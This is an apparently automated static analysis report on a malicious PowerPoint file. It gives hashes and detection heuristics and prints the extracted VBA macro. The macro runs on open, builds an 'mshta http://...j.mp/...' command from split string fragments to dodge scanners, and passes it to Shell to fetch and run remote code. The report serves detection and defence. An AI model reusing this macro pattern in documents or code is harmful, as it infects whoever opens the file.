Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 dffd29f5fcbcb7ee…

MALICIOUS

Office (OOXML)

11.9 KB First seen: 2021-05-04
MD5: c8e1760af8a65590d26315a4ff144b62 SHA-1: 22106e0f2bb984249d450e950207b27dd113daba SHA-256: dffd29f5fcbcb7ee1f0a4d31e3cf616b6a525275b49d9d47d625f811f48cfc08
152 Risk Score

Heuristics 6

  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Shell _
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
    Matched line in script
    Shell _
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Sub Auto_Open()
  • VBA project signed with a self-signed certificate info OLE_VBA_SIGNATURE_SELF_SIGNED
    The VBA project is signed, but the signing certificate is self-signed (issuer equals subject) — no certificate authority vouches for the signer. Self-signed VBA signing is the common trick to make a macro project appear signed/trusted without a real publisher identity.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.google.com In document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas🔏 Self-signedVBA project digital signature
Covers VBA source only — not the compiled p-code. A digital signature does not by itself mean the macro is safe.		 vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 809 bytes
SHA-256: 2fdabf81bde281c71010da6dbe27b960df4c02fa248510bd05434bb04ec2ac4d
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Module"
Sub Auto_Open()
Dim calc As New polar

p_ = calc _
.computer + calc _
.computer2 + calc _
.computer3



Shell _
p_



End Sub

Attribute VB_Name = "polar"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Public Property Get computer() As String
computer = "m" + "s" + "h" + "t" + "a h"
End Property
Public Property Get computer2() As String
computer2 = "t" + "t" + "p" + ":" + "/" + "/" + "w" + "w" + "w"
End Property
Public Property Get computer3() As String
computer3 = ".j.mp/ddsobpechateessentesathatesesjdw"
End Property
vbaProject_00.bin🔏 Self-signedVBA project digital signature
Covers VBA source only — not the compiled p-code. A digital signature does not by itself mean the macro is safe.		 vba-project OOXML VBA project: ppt/vbaProject.bin 22528 bytes
SHA-256: f1eb5a5674240568a33aca4cd61e73261b101142d193b7af8d6250bb6d764fe2

Open this report in the interactive analyzer, or submit your own file for analysis.